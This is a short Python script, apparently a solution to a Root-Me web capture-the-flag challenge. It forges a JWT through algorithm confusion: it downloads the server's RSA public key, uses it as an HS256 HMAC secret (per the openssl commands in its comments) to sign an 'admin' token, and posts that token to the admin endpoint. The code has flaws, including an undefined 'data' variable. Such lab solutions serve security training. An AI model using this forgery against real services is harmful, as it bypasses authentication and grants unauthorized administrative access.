import requests
import jwt
import urllib

print('testok')

url="http://challenge01.root-me.org/web-serveur/ch60/"
uri = "key"
result = requests.get(url+uri)

publickey=result.text.replace('[','').replace(']','').split(',')


publicstr =''

for line in publickey:
	line= line.encode('utf-8').replace('\"','').strip()
	publicstr+=line+'\n'
	
print(publicstr.encode('hex'))

#这里需要将publicstr.encode('hex')   cat public.txt | xxd -p | tr -d "\\n" 
#echo -n "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbWluIn0" | openssl dgst -sha256 -mac HMAC -macopt hexkey:2d2d2d2d2d424547494e20505[STRIPPED]592d2d2d2d2d0a
#python -c "exec(\"import base64, binascii\nprint base64.urlsafe_b64encode(binascii.a2b_hex('db3a1b760eec81e029704691f6780c4d1653d5d91688c24e59891e97342ee59f')).replace('=','')\")"
headers ={
	"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
	"Accept-Encoding":"gzip, deflate",
	"Accept-Language":"en-US,en;q=0.5",
	"Connection":"keep-alive",
	"Upgrade-Insecure-Requests":"1",
	"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0",
	"Content-Type":"application/json",

}

uri = 'admin'
url+=uri
headers['Authorization']="Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbWluIn0.auUWOWeQWOYnNzHPgrkCSYc8B8Te4HH2I4Qnsy_IdSs"
result = requests.post(url=url,data=data,headers=headers)
print(result.text)




